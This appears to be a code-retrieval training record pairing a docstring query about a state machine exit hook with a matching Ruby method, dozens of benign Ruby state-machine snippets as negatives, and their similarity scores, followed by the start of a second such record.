"def state=(state)\n if not STATES.include? state\n raise PreconditionError, \"Invalid game victory state.\"\n end\n super\n changed(true)\n notify_observers U_COMPLETED, state, self.currentPlayer\n if not self.state == state\n raise PostconditionError, \"State not set correctly.\"\n end\n self.state\n end",
"def with_keeping_state\n if control.key? :saved\n state_machine.load_current_state(control[:saved])\n else\n state_machine.set_initial_state\n end\n yield\n control[:saved] = state_machine.save_current_state \n end",
"def state=(value)\n @state = value\n end",
"def transition_to_state(state)\n @engine.dispatch do\n run_state!(state)\n end\n \n state\n end",
"def update_state(*args)\n if transition_choice?\n found_trans = machine.select_transition(name, *args)\n machine.state = found_trans.to_states.first\n else\n transitions = machine.transitions[name]\n machine.state = transitions[machine.state] || transitions[ANY_STATE] || name\n end\n end",
"def state=(value)\n @state = value\n end",
"def state=(value)\n @state = value\n end",
"def state=(value)\n @state = value\n end",
"def state=(value)\n @state = value\n end",
"def state=(value)\n @state = value\n end",
"def state=(value)\n @state = value\n end",
"def state=(value)\n @state = value\n end",
"def state=(value)\n @state = value\n end",
"def state=(value)\n @state = value\n end",
"def state=(value)\n @state = value\n end",
"def transition\n new_state = fetch_sensor_state\n return if new_state == @state\n puts \"Transitioned from #{@state} to #{new_state}\"\n if valid_transition?(new_state)\n @state = new_state\n # Do nothing\n else\n puts \"Invalid transition!\"\n @beam_broken = 0\n # TODO: toss up the correct error light\n end\n end",
"def state\n @actions << :state\n self.class.mocked_states.shift\n end",
"def known_states; end",
"def known_states; end",
"def known_states; end",
"def add_state(v)\nunless has_state?(v)\n@state[v] = true\n@transition[v] = {}\nend\nend",
"def states\n raise \"You must override the states method.\"\n end",
"def on_start_exit(new_state, event, *args)\n @log.debug \" [#{current_state}]: on_exit : #{event} -> #{new_state}; args: #{args}\"\n @context = Context.new(current_state,@lsi)\n end",
"def update\n \t@currentState.update\n\tend",
"def mon_try_enter\n @mon_data.try_enter\n end",
"def answer_on_incoming()\n update({:state => 'active'})\n reload()\n end",
"def state(name)\n @state.push(name)\n end",
"def impose_state(s) # :args: state\n @_hegemon_state = s\n nil end",
"def setState(state)\n\t\t\traise \"undefined state.\\n\" if state.nil?\n\t\t\traise \"#{state} is not a Statemap.State.\\n\" unless state.is_a?(Statemap::State)\n\t\t\t@_state = state\n\t\t\tif @_debug_flag then\n\t\t\t\t@_debug_stream.puts \"ENTER STATE : %s\\n\" % @_state.getName\n\t\t\tend\n\t\tend",
"def state\r\n {\r\n scene: type, prompt: prompt\r\n }\r\n end",
"def state_initialized!\n transition_to_state(:finished)\n end",
"def setup(state) ; end",
"def passing\n state(\"passing\")\n end",
"def read_state\n end"
] |
[
"0.864452",
"0.7388078",
"0.7267375",
"0.7100114",
"0.7008565",
"0.69991297",
"0.6852792",
"0.6739538",
"0.673245",
"0.66867673",
"0.6661357",
"0.6661357",
"0.6661357",
"0.6661357",
"0.6661357",
"0.6661357",
"0.6661357",
"0.6661357",
"0.6517782",
"0.649624",
"0.64776254",
"0.64375514",
"0.64014673",
"0.63847995",
"0.63847995",
"0.63814396",
"0.6360734",
"0.6346449",
"0.6346449",
"0.6346449",
"0.6346449",
"0.6346449",
"0.6346449",
"0.6346449",
"0.6244888",
"0.6239195",
"0.621354",
"0.621354",
"0.621354",
"0.621354",
"0.621354",
"0.621354",
"0.621354",
"0.6187649",
"0.6179513",
"0.61584514",
"0.6113768",
"0.60563725",
"0.5988011",
"0.5966556",
"0.59513795",
"0.5931095",
"0.5914714",
"0.59058326",
"0.58991075",
"0.5887797",
"0.58473074",
"0.5840666",
"0.58312285",
"0.5830605",
"0.5826673",
"0.5823605",
"0.5821576",
"0.5816636",
"0.58106583",
"0.5804845",
"0.5804769",
"0.58012015",
"0.58011687",
"0.5784152",
"0.57780004",
"0.5761604",
"0.5750405",
"0.5750405",
"0.5750405",
"0.5750405",
"0.5750405",
"0.5750405",
"0.5750405",
"0.5750405",
"0.5750405",
"0.5750405",
"0.5750109",
"0.57400703",
"0.5715863",
"0.5715863",
"0.5715863",
"0.5709481",
"0.56913",
"0.5670019",
"0.56482553",
"0.5630037",
"0.562261",
"0.56191045",
"0.5618563",
"0.5612316",
"0.5605534",
"0.5605052",
"0.56046164",
"0.56018704",
"0.55864024"
] |
0.0
|
-1
|
Called by Machine when State is exited.
|
def exit! machine, args
_behavior! :exit, machine, args
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def exit_state\n end",
"def exit e\n raise StateProcessorExit, e\n end",
"def exit_state\n puts \"Exiting #{self.class}\"\n execution_state = EXECUTION_STATE[:completed]\n end",
"def exit(state_manager, game)\n exiting = true\n end",
"def exit!\n map = @transition_map\n map.each do |type, events_to_transition_arrays|\n events_to_transition_arrays.each do |event, transitions|\n transitions.each(&:unarm)\n end\n end\n\n @exit_actions.each do |exit_action|\n exit_action.call(@state_machine)\n end\n @state_machine.current_state = nil\n end",
"def exit\n case @status\n when :sleep\n wake_resume(:exit)\n when :run\n throw :exit\n end\n end",
"def on_exit(&block)\n @state.exit_actions << block\n end",
"def at_exit\n\n\t\tend",
"def exited?(*) end",
"def on_exit\n end",
"def shut_down\n end",
"def endState(tag)\n raise \"Not implemented\"\n end",
"def exit() end",
"def handle_exit(event)\n @status = :terminated_by_management\n @exit_code = event[:data]\n end",
"def leave; end",
"def terminates\n event :failed, command: true, terminal: true\n interruptible\n end",
"def exit\n Rushmate::Exit\n end",
"def exit!() end",
"def stop_and_cleanup\n raise_outside_initial_queue\n @state_machine.log \"Stopping #{self}...\" if @verbose\n @current_state.send :exit!\n @current_state = nil\n @state_symbols_to_states.values.each(&:cleanup)\n end",
"def shutdown_execution\n stopped_event.set\n end",
"def after_exit(&block)\n end",
"def cmd_exit(*args)\n\t\tshell.stop\n\tend",
"def mark_as_exit\n @exit = true\n end",
"def register_exit\n if @state > 0\n @state -= 1\n else\n raise \"Queue #{@label} is empty. Cannot register exit.\"\n end\n end",
"def unclean_shutdown_state\n super\n end",
"def exit!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 26 )\n\n type = EXIT\n channel = ANTLR3::DEFAULT_CHANNEL\n\n \n # - - - - main rule block - - - -\n # at line 328:8: 'exit'\n match( \"exit\" )\n\n \n @state.type = type\n @state.channel = channel\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 26 )\n\n end",
"def shutdown\n log 'Exiting...'\n @shutdown = true\n end",
"def exit\n\t\tquit\n\tend",
"def shutdown\n @snmptrap.exit\n end",
"def check_out\n @server[\"/worker\"].put({\n :name => @name,\n :terminated => true\n })\n log 'exiting'\n end",
"def shutdown\n end",
"def exit\n raise ActionExit.new\n end",
"def state_removed! statemachine\n transitions_changed!\n end",
"def handle_exit\n __exit! if respond_to?(:__exit!)\n exit(0)\n end",
"def shutdown\n end",
"def shutdown; end",
"def shutdown; end",
"def shutdown; end",
"def shutdown; end",
"def shutdown; end",
"def shutdown; end",
"def shutdown; end",
"def shutdown\n end",
"def shutdown\n end",
"def shutdown\n end",
"def shutdown\n end",
"def finish() #method\n puts \"Menu cooked successfully.\"\n exit\n end",
"def exit_program\n exit\n end",
"def shutdown\n logger.info('Shutting down ...')\n @lock.synchronize do\n @shutdown = true\n end\n\n reset\n exit\n end",
"def shutdown\n @stopped = false\n end",
"def exit \n \"exit\" \n end",
"def at_exit(&block); end",
"def game_exit\n Message.game_quit\n false\n end",
"def exit\n send_cmd \"exit\"\n nil\n end",
"def shutdown\r\n\t\t\tsay \"#{name}: Exiting...\"\r\n\t\t\t@shutdown = true\r\n\t end",
"def on_exit(status)\n RightLinkLog.debug(format_log_message(\"Stopping pipe server\"))\n @pipe_server.stop\n @pipe_server = nil\n\n RightLinkLog.debug(format_log_message(\"Stopping chef node server\"))\n RightScale::Windows::ChefNodeServer.instance.stop\n\n RightLinkLog.debug(format_log_message(\"Terminated\"))\n @response_event.signal\n end",
"def close\r\n pop_game_state\r\n end",
"def quit(msg)\n if @started\n msg.reply('Game exited.'.freeze)\n @started = false\n @random_number = nil\n @tries = nil\n else\n msg.reply('There is not game to exit.'.freeze)\n end\n end",
"def exit &block\n @actions[:exit] = block\n end",
"def shutdown\n @done = true\n end",
"def shutdown\n @done = true\n end",
"def exit_program\n exit\n end",
"def on_exit\n\t\tputs \"live coding history: #{@history.size} states\"\n\tend",
"def exit\n check_running\n @running = false\n @dispatchers.each(&:exit)\n @pool.exit\n end",
"def shut_down\n puts\n end",
"def exit\n ExitThread(0)\n end",
"def irb_exit(ret = 0)\n irb_context.exit(ret)\n end",
"def shutdown\n sysout(\"System going for shutdown\")\n #Do I/O (save to file for example)\n puts(\"Food Item Tracker Terminated\")\n end",
"def shutdown\n sysout(\"System going for shutdown\")\n #Do I/O (save to file for example)\n puts(\"Food Item Tracker Terminated\")\n end",
"def on_start_exit(new_state, event, *args)\n @log.debug \" [#{current_state}]: on_exit : #{event} -> #{new_state}; args: #{args}\"\n @context = Context.new(current_state,@lsi)\n end",
"def shutdown\n puts \"shutting down\"\n @run = false\n thread_list.each do |thread|\n thread.raise ExitError\n end\n end",
"def coolest_exit\n Kernel.exit! 99\n end",
"def after_state(state)\n end",
"def shutdown\n\tend",
"def shutdown(editted, database, log)\n\tsysout(\"System going for Shutdown\")\n\tsave(database)\n\tsaveLog(log)\n\tabort(\"Diet Manager Terminated\")\nend",
"def exit(env_ptr, code)\n @devices.each_value do |device|\n device.close\n end\n \n unless code == 0\n # Abnormal exit codes can indicate a CLIPS SYSTEM ERROR\n # This gives developers a chance to catch debugging information\n raise ExitError.new(code)\n end\n \n code\n end",
"def each_exit(&block)\n @exits.each &block\n end",
"def finalize\r\n push_game_state(Main) # switch to game state \"Menu\"\r\nend",
"def exit\n @interface.hide\n # sth to destroy all dat shit??\n # Shut down propeller\n end",
"def shutdown\n @running = false\n \n super\n \n end",
"def leave()\n raise NotImplementedError\n end",
"def finaliser_finished(source, *args)\n @manager.allure_stop\n end",
"def stop()\n @state = STOPPED\n end",
"def shutdown\n reset\n @agent.shutdown\n end",
"def exit\n @server.check_out(@host) unless @server.nil?\n end",
"def shutdown\n shutdown_message\n @actions.each(&:shutdown)\n @threads.each(&:exit)\n end",
"def exit(ret = 0)\n IRB.irb_exit(@irb, ret)\n rescue UncaughtThrowError\n super\n end",
"def exit_concurrent(opts)\n @substates.each { |substate| substate.exit(opts) }\n call_exit_handler(opts[:context])\n @__is_current__ = false\n trace_state(\"State: [EXIT] : #{self.path}\") if self != root\n self\n end",
"def shut_down\n @shutdown_lock.synchronize {\n return if @shutting_down\n @shutting_down = true\n }\n die NO_ERROR\n end",
"def exit_build\n build_stack.pop\n end",
"def delayed_exit\n sleep 0.1\n exit\n end",
"def on_shutdown\n\t\tend",
"def on_leave\n fire_handler :LEAVE, self\n end",
"def destroyed(event)\n self.state = nil if event.target.data[:id] == state\n refresh\n end",
"def exit(args)\nend",
"def send_exit(recipient, reason)\n recipient.notify_exited(CURRENT.value, reason)\n self\n end",
"def terminate\n end",
"def exit(res=0) end",
"def end_hook name\n # this should be implemented in sub-classes\n end",
"def terminate() end"
] |
[
"0.7859571",
"0.7460003",
"0.7445855",
"0.74094474",
"0.73574936",
"0.693379",
"0.69150406",
"0.6909679",
"0.68527645",
"0.67798895",
"0.6739769",
"0.6709862",
"0.67062205",
"0.66558194",
"0.6646841",
"0.66213185",
"0.6604686",
"0.65873843",
"0.6531353",
"0.65146357",
"0.6497114",
"0.64210963",
"0.6405017",
"0.63637245",
"0.63381785",
"0.63174874",
"0.6307309",
"0.6231059",
"0.6216333",
"0.61940575",
"0.6191872",
"0.61917627",
"0.6190087",
"0.6189733",
"0.61714983",
"0.6156913",
"0.6156913",
"0.6156913",
"0.6156913",
"0.6156913",
"0.6156913",
"0.6156913",
"0.61521405",
"0.61521405",
"0.61521405",
"0.61521405",
"0.6151212",
"0.61374974",
"0.6134097",
"0.6119675",
"0.61111814",
"0.6107732",
"0.6102899",
"0.6095746",
"0.6085924",
"0.6085506",
"0.6083478",
"0.60815966",
"0.6080869",
"0.60787594",
"0.60787594",
"0.6072663",
"0.60606223",
"0.6060544",
"0.60540265",
"0.6050191",
"0.60496455",
"0.6047735",
"0.6047735",
"0.60337013",
"0.6021641",
"0.60202557",
"0.6017827",
"0.601327",
"0.6000152",
"0.59973675",
"0.59840477",
"0.5980364",
"0.597652",
"0.597551",
"0.5966603",
"0.5964685",
"0.59593135",
"0.59573925",
"0.5953139",
"0.59485394",
"0.5945875",
"0.5945039",
"0.59448963",
"0.59402156",
"0.5938599",
"0.5934364",
"0.59343165",
"0.5915855",
"0.5903802",
"0.59000635",
"0.589521",
"0.58950007",
"0.5893088",
"0.58912426"
] |
0.663212
|
15
|
Called by Machine when State is transitioned to.
|
def doActivity! machine, args
_behavior! :doActivity, machine, args
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def enter_state\n end",
"def transition\n new_state = fetch_sensor_state\n return if new_state == @state\n puts \"Transitioned from #{@state} to #{new_state}\"\n if valid_transition?(new_state)\n @state = new_state\n # Do nothing\n else\n puts \"Invalid transition!\"\n @beam_broken = 0\n # TODO: toss up the correct error light\n end\n end",
"def transition_to_state(state)\n @engine.dispatch do\n run_state!(state)\n end\n \n state\n end",
"def transition(symbol, to)\n @subject.transitions[@state][symbol] = to\n end",
"def state_changed\n @state_condition.signal @state\n end",
"def transition_to(state)\n puts \"Context: Transition to #{state.class}\"\n @state = state\n @state.context = self\n end",
"def transition_to(state)\n puts \"Context: Transition to #{state.class}\"\n @state = state\n @state.context = self\n end",
"def transition_state_machine!(new_state, emit_params = {})\n state_machine.transition_to!(new_state, emit_object(new_state, emit_params))\n end",
"def transition_state_machine(new_state, emit_params = {})\n state_machine.transition_state(new_state, emit_object(new_state, emit_params))\n end",
"def jump_to_state(state)\n logger.debug \"STATE JUMP! to #{state}\"\n \n render_state(state)\n end",
"def on_state_begin(state_id)\n end",
"def do_transition!( transition )\n state.trigger( transition.to_sym )\n self.save\n end",
"def after_state(state)\n end",
"def after_transition(*args, &block); end",
"def trigger!\n\treturn if (@next_state_name == nil)\n\n\tcurrent_state = nil\n current_state = @states.fetch(@current_state_name) unless @current_state_name.nil?\n\n\tnext_state = @states.fetch(@next_state_name)\n next_state_name = @next_state_name\n\n\t@next_state_name = nil\n\n\tcurrent_state.atexit if(current_state.respond_to?(:atexit))\n\t@current_state_name = next_state_name\n\tnext_state.atentry if(next_state.respond_to?(:atentry))\n end",
"def state_added! statemachine\n transitions_changed!\n end",
"def trans(from, to, name)\n StateMachineChecker::Transition.new(from, to, name)\nend",
"def transition_to(state)\n case state\n when :announced\n # announce successful; set state\n @state = :announced\n\n # Reset the entity timer\n @entity_last_seen = Time.now\n\n # Set last snapshot to 10 minutes ago\n # so we send a snapshot on first report\n @last_snapshot = Time.now - 601\n when :unannounced\n @state = :unannounced\n else\n ::Instana.logger.warn \"Uknown agent state: #{state}\"\n end\n end",
"def go_state (index)\n @state = @states[index]\n end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def finished!\n Mua::State::Transition.new(state: self.terminal_states[0])\n end",
"def transition(state, next_length)\n @logger.debug(\"Transitioning\", :transition => state, :nextlen => next_length)\n @state = state\n # TODO(sissel): Assert this self.respond_to?(state)\n # TODO(sissel): Assert next_length is a number\n need(next_length)\n end",
"def state\n end",
"def perform_state_update\n return unless state_changed?\n\n return if @ignore_state_changes\n\n case state_change\n when %w(mill_build buyer_unclaimed)\n transition_mill_build_to_buyer_unclaimed\n when %w(buyer_unclaimed buyer_build)\n transition_buyer_unclaimed_buyer_build\n when %w(buyer_build pending)\n transition_buyer_build_to_pending\n when %w(pending ordered)\n transition_pending_to_ordered\n when %w(ordered closed)\n transition_ordered_to_closed\n end\n end",
"def transition(old_state, new_state)\n \"#{old_state} -> #{new_state}\"\n end",
"def transitions; end",
"def update_state(*args)\n if transition_choice?\n found_trans = machine.select_transition(name, *args)\n machine.state = found_trans.to_states.first\n else\n transitions = machine.transitions[name]\n machine.state = transitions[machine.state] || transitions[ANY_STATE] || name\n end\n end",
"def execState\n findNextState\n current_state = @state_list[@state][@transition]\n\n @transition = eval \"#{@state}\"\n @history.push @state\n\n @finished = @state == :finish\n end",
"def transition_to(event)\n handle event\n @version = version.next\n end",
"def transition_at; end",
"def transition_at; end",
"def transition\n @transition ||= begin\n state_machine = MicroMachine.new( state || \"ready\" )\n\n state_machine.when(:start, \"ready\" => \"in_progress\")\n state_machine.when(:cancel, \"ready\" => \"cancelled\",\n \"in_progress\" => \"cancelled\")\n state_machine.when(:complete, \"in_progress\" => \"completed\")\n\n state_machine.on(:any) { self.state = transition.state }\n\n state_machine\n end\n end",
"def transition( trigger )\r\n raise \"Must set the current/start state first.\" unless @state\r\n\r\n initial_state = @state if $DEBUG\r\n\r\n handler_name = self.class.state_handler_name[ @state ]\r\n unless handler_name\r\n puts \"No handler for state #@state\" if $DEBUG\r\n return nil\r\n end\r\n\r\n # Invoke the handler for this state, passing in the trigger\r\n # and use the return value as the new state\r\n @state = send( handler_name, trigger )\r\n puts \"#{self}.transition(#{trigger}) :: #{initial_state} -> #@state\" if $DEBUG\r\n @state\r\n end",
"def transition_to(path, current_state=self.current_state)\n path = path.to_s\n state = current_state || self\n exit_states = []\n\n # Find the nearest parent state on the path of the current state which\n # has a sub-state at the given path\n new_states = state.find_states(path)\n while(!new_states) do\n exit_states << state\n state = state.parent_state\n raise(StateNotFound, transition_error(path)) unless state\n new_states = state.find_states(path)\n end\n\n # The first time we enter a state, the state_manager gets entered as well\n new_states.unshift(self) unless has_state?\n\n # Can only transition to leaf states\n # TODO: transition to the initial_state of the state?\n raise(InvalidTransition, transition_error(path)) unless new_states.last.leaf?\n\n enter_states = new_states - exit_states\n exit_states = exit_states - new_states\n\n from_state = current_state\n # TODO: does it make more sense to throw an error instead of allowing\n # a transition to the current state?\n to_state = enter_states.last || from_state\n\n run_before_callbacks(from_state, to_state, current_event, enter_states, exit_states)\n\n # Set the state on the underlying resource\n self.current_state = to_state\n\n run_after_callbacks(from_state, to_state, current_event, enter_states, exit_states)\n end",
"def enter!\n @state_machine.current_state = self\n\n @entry_actions.each do |entry_action|\n entry_action.call(@state_machine)\n end\n @transition_map.each do |type, events_to_transition_arrays|\n events_to_transition_arrays.each do |event, transitions|\n transitions.each(&:arm)\n end\n end\n end",
"def change_state(next_state)\n @state = next_state\n if @verbose\n puts \"\\n================================================================================\\n\\n\"\n puts \"log: change state to \" + current_state_string\n end\n end",
"def to_state(*args)\n if transition_choice?\n found_trans = machine.select_choice_transition(name, from_state, *args)\n found_trans.map[from_state] || found_trans.map[ANY_STATE]\n else\n available_trans = machine.transitions[name]\n available_trans[from_state] || available_trans[ANY_STATE]\n end\n end",
"def update_state\n raise \"Nothing to do\"\n end",
"def new_state\n newID = @@nextID\n @@nextID += 1\n @state[newID] = true\n @transition[newID] = {}\n newID \n end",
"def new_state\n newID = @@nextID\n @@nextID += 1\n @state[newID] = true\n @transition[newID] = {}\n newID \n end",
"def new_state\n newID = @@nextID\n @@nextID += 1\n @state[newID] = true\n @transition[newID] = {}\n newID \n end",
"def on_state_timeup(state_id)\n end",
"def on_state(state, &block)\n end",
"def transition(name, from_names, to_name, options = {})\n Array(from_names).each do |from_name|\n @machine.transition(name, from_name, to_name, options)\n end\n nil # do not expose FSM details\n end",
"def switch_state(state)\n node.switch_state(state)\n end",
"def switch_state state\n\t\t\t@state_buffer = Proc.new do\n\t\t\t\t@objs2 = []\n\t\t\t\t@current_state = state\n\t\t\t\t@current_state.setup\n\t\t\tend\n\t\tend",
"def states; end",
"def passing\n state(\"passing\")\n end",
"def transition(event_name)\n if to = next_state(event_name)\n begin\n result = yield\n rescue => e\n if error_state = error_state(event_name, e)\n @subject.send(\"#{state_method}=\", error_state)\n return result\n else\n raise\n end\n end\n # TODO refactor out to AR module\n if defined?(::ActiveRecord) && @subject.is_a?(::ActiveRecord::Base)\n if @subject.errors.entries.empty?\n @subject.send(\"#{state_method}=\", to)\n return true\n else\n return false\n end\n else\n @subject.send(\"#{state_method}=\", to)\n return result\n end\n else\n illegal_event_callback event_name\n end\n end",
"def state\n @actions << :state\n self.class.mocked_states.shift\n end",
"def next_state\n newstate = state_transition_out\n newiteration = @iteration\n if [:day, :signup].include?(@state)\n newiteration = @iteration + 1\n end\n @state = newstate\n @iteration = newiteration\n #state_transition_in\n @state\n end",
"def state_removed! statemachine\n transitions_changed!\n end",
"def before_state(state)\n end",
"def apply( stack )\n\t\traise Pushdown::TransitionError, \"can't switch on an empty stack\" if stack.empty?\n\n\t\tstate = self.state_class.new( self.data )\n\n\t\tself.log.debug \"switching current state with a new state: %p\" % [ state ]\n\t\told_state = stack.pop\n\t\told_state.on_stop if old_state\n\n\t\tstack.push( state )\n\t\tstate.on_start\n\n\t\treturn stack\n\tend",
"def change_state(contestant_symbol, contestant_move)\n\t\t@current_state[contestant_move] = contestant_symbol\n\tend",
"def state_initialized!\n transition_to_state(:finished)\n end",
"def state_machine=(value)\n @state_machine = value.dup\n end",
"def state_machine=(value)\n @state_machine = value.dup\n end",
"def add_state(v)\nunless has_state?(v)\n@state[v] = true\n@transition[v] = {}\nend\nend",
"def state= new_state\n @state = new_state\n end",
"def transitions_to(state)\n find_all_transitions(:to_state => state)\n end",
"def make_transition(transition)\n raise ArgumentError, \"Cannot transition from #{self.current_state} with #{transition}\" unless\n transition.from_state == self.current_state\n \n self.current_state = transition.to_state\n @available_actions = nil\n add_reward(transition.reward)\n end",
"def update_transitions\n from_states.each do |from|\n if (value = machine.transitions[name][from])\n machine.transitions[name][from] = [value, map[from]].flatten\n else\n machine.transitions[name][from] = map[from] || ANY_STATE\n end\n end\n end",
"def update_transition\r\n # If transition is processing\r\n if $game_temp.transition_processing\r\n # Clear transition processing flag\r\n $game_temp.transition_processing = false\r\n # Execute transition\r\n if $game_temp.transition_name == \"\"\r\n Graphics.transition(20)\r\n else\r\n Graphics.transition(40, \"Graphics/Transitions/\" +\r\n $game_temp.transition_name)\r\n end\r\n end\r\n end",
"def new_state\nnewID = @@nextID\n@@nextID += 1\n@state[newID] = true\n@transition[newID] = {}\nnewID\nend",
"def state_on_table_game_end\n @log.debug(\"Net_state: change to state state_on_table_game_end\")\n @network_state = :state_on_table_game_end\n make_state_change_ntfy(:ntfy_state_on_table_game_end)\n end",
"def after_transition(object, transition)\n\n # current_user_session = Session.activated? ? Session.find : nil\n #\n # if current_user_session\n # author = current_user_session.user\n # elsif object.respond_to?(:user)\n # author = object.user\n # end\n #\n # to_state = transition.attributes[:to_name]\n # object.state_events.create({\n # :previous_state => transition.attributes[:from],\n # :name => transition.attributes[:event].to_s,\n # :user_id => author && author.id\n # })\n #\n # ActiveRecord::Base.logger.info(\"#{object.class}##{object.id}: #{transition.attributes[:from]} => #{transition.attributes[:to]}\")\n end",
"def update_state(record, bang)\n record.send(\"#{machine.attribute}=\", @options[:to])\n bang ? record.save! : record.save\n end",
"def call_transition_method(*args)\n unless [:logger, :command_listener].include?(agent_type)\n log do |msg|\n msg.add_record(agent_type, \"action\", \"transit\")\n msg.add_record(agent_type, \"state\", args.first)\n msg.add_record(agent_type, \"uuid\", uuid)\n end\n end\n super\n end",
"def start_transition\n nil\n end",
"def state\n @state\n end",
"def update_transition\r\n # If transition processing\r\n if $game_temp.transition_processing\r\n # Clear transition processing flag\r\n $game_temp.transition_processing = false\r\n # Execute transition\r\n if $game_temp.transition_name == ''\r\n Graphics.transition(20)\r\n else\r\n Graphics.transition(40, 'Graphics/Transitions/' +\r\n $game_temp.transition_name)\r\n end\r\n end\r\n end",
"def transition(from, to)\n ev, *args = trigger(from)\n raise IllegalTransition, \"No transition to :#{ev}\" unless to.include?(ev)\n ev = yield ev if block_given?\n send \"perform_#{ev}\", *args\n end",
"def transition(from, to)\n ev, *args = trigger(from)\n raise IllegalTransition, \"No transition to :#{ev}\" unless to.include?(ev)\n ev = yield ev if block_given?\n send \"perform_#{ev}\", *args\n end",
"def resume(*)\n super.tap do\n __debug_sim(\"*** RESUME WORKFLOW STATE #{prev_state} ***\")\n end\n end",
"def state\n @state\n end",
"def enter_state\n puts \"Entering #{self.class}\"\n execution_state = EXECUTION_STATE[:active]\n end",
"def control_state_change(&block)\n # Look for a default transition\n default_transition = state_transitions.detect {|t| t.event == :take_default_path }\n\n if default_transition.present?\n # This ugly thing should yield the default transition first followed by\n # any other transitions to states that aren't the default...\n yield( [default_transition] + state_transitions.reject {|t| t.to == default_transition.to } )\n elsif state_transitions.present?\n # ...if there's no default transition but there are still other transitions\n # present then yield those.\n yield(state_transitions)\n end\n\n nil\n end",
"def state\n @state\n end",
"def local_transition!(state:)\n Mua::State::Transition.new(state: state, parent: false)\n end",
"def times_walked_to(state); end",
"def final_state(state)\n final_states(state)\n end",
"def synchronize_state_with_statemachine(*args)\n log_state_machine_state_change\n change_state state_machine.current_state, state_machine.last_transition.metadata\n end",
"def move_to_state(s)\n case s.to_sym\n when :pending\n register if passive?\n when :active\n activate if pending? || deleted?\n unsuspend if suspended?\n when :suspended\n suspend if passive? || pending? || active?\n when :deleted\n delete if passive? || pending? || active? || suspended?\n end\n end",
"def transition(&block)\n @transition_function = block\n end",
"def transition!(state:, parent: nil)\n Mua::State::Transition.new(state: state, parent: parent)\n end",
"def rollback\n each {|transition| transition.machine.write(object, :event, transition.event)}\n super\n end",
"def communicate_transition(_ = nil, _ = nil, _ = nil)\r\n end",
"def save\n @saved = @state\n end",
"def fire_state_changed\n @sce = ChangeEvent.new(self) if @sce.nil?\n fire_handler :STATE_CHANGE, @sce\n end",
"def live\r\n @state=1\r\n end",
"def after\n each {|transition| transition.machine.write(object, :event_transition, transition)} if skip_after && success?\n super\n end",
"def transitions\n raise NotImplementedError, 'Subclasses must override transitions'\n end",
"def state=(s)\n @state = s\n end"
] |
[
"0.73521835",
"0.7239314",
"0.6951051",
"0.69235647",
"0.6803045",
"0.6796859",
"0.6796859",
"0.6795984",
"0.6698488",
"0.66912794",
"0.6645278",
"0.6639114",
"0.6617801",
"0.6614779",
"0.6591182",
"0.6577655",
"0.6552369",
"0.65447086",
"0.6538006",
"0.6523302",
"0.6523302",
"0.6523302",
"0.6523302",
"0.6523302",
"0.6523302",
"0.6523302",
"0.6523302",
"0.65112245",
"0.6508864",
"0.6497885",
"0.6467895",
"0.6378109",
"0.63724816",
"0.6364416",
"0.63564765",
"0.633654",
"0.63363",
"0.63363",
"0.6327773",
"0.63238233",
"0.63233376",
"0.63017166",
"0.62901646",
"0.626313",
"0.6248591",
"0.62297726",
"0.62297726",
"0.62297726",
"0.61830443",
"0.6169265",
"0.61671543",
"0.61564404",
"0.61277133",
"0.6115696",
"0.6108254",
"0.60859597",
"0.6077148",
"0.6060042",
"0.6045967",
"0.60251886",
"0.60118043",
"0.60072577",
"0.59966344",
"0.5967236",
"0.5967236",
"0.5963642",
"0.59588754",
"0.59554315",
"0.59455234",
"0.5945496",
"0.59425455",
"0.5917181",
"0.5916204",
"0.591432",
"0.59115845",
"0.58969885",
"0.5893486",
"0.5893175",
"0.5886167",
"0.5878363",
"0.5878363",
"0.58752215",
"0.5850939",
"0.58490133",
"0.58444923",
"0.58358186",
"0.5833366",
"0.582803",
"0.5819042",
"0.5813428",
"0.5808069",
"0.58034307",
"0.57936823",
"0.57899165",
"0.5788142",
"0.57850546",
"0.5784966",
"0.57816",
"0.5777161",
"0.5772624",
"0.57718354"
] |
0.0
|
-1
|
Called after this State is added to the StateMachine.
|
def state_added! statemachine
transitions_changed!
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def after_state(state)\n end",
"def after_created\n super.tap do |val|\n app_state_bundle(self)\n end\n end",
"def after_created\n super.tap do |val|\n app_state_ruby(self)\n end\n end",
"def after_appending( state )\n\t\t# Nothing to do\n\t\treturn nil\n\tend",
"def after_created\n super.tap do |val|\n app_state_python(self)\n end\n end",
"def extra_state; end",
"def enter_state\n end",
"def post_init\n end",
"def before_appending( state )\n\t\t# Nothing to do\n\t\treturn nil\n\tend",
"def add_states(new_states); end",
"def after_initialize\n end",
"def chain_state\n super\n end",
"def post_initialize\n end",
"def post_initialize\n # raise NotImplementedError\n end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def after_initialized\n end",
"def post_init\n end",
"def initial_state=(new_initial_state); end",
"def callback_phase\n super\n end",
"def after_initialize(&block); end",
"def final_state(state)\n final_states(state)\n end",
"def after_save\n super\n run_after_instance_hooks(:after_save)\n @instance_hooks.clear if @instance_hooks\n end",
"def initialize\n @state = :new\n end",
"def finalize\r\n push_game_state(Main) # switch to game state \"Menu\"\r\nend",
"def before_state(state)\n end",
"def state_initialized!\n transition_to_state(:finished)\n end",
"def after_initialize; end",
"def after_initialize; end",
"def after_initialize; end",
"def after_initialize; end",
"def post_init()\n puts \"#{self} post_init done!\"\n end",
"def post_init()\n puts \"#{self} post_init done!\"\n end",
"def hash_more_data_state\n super\n end",
"def explicit_state\n super\n end",
"def state_removed! statemachine\n transitions_changed!\n end",
"def _after_update\n # SEQUEL5: Remove\n @this = nil\n end",
"def after_init\n end",
"def on_state_begin(state_id)\n end",
"def force_final_state\r\n @final_state = true\r\n end",
"def post_init\n\tend",
"def before_start\n super\n self.sub_state = :before unless self.sub_state\n end",
"def reset_state_at_page_finish\n add_content(\"\\nQ\" * @state_stack.size)\n end",
"def finalize\n lifecycle.container.each do |key, item|\n container.register(key, item) unless container.registered?(key)\n end\n self\n end",
"def setup_state_machine\n @line_number = 1\n reset_reading\n end",
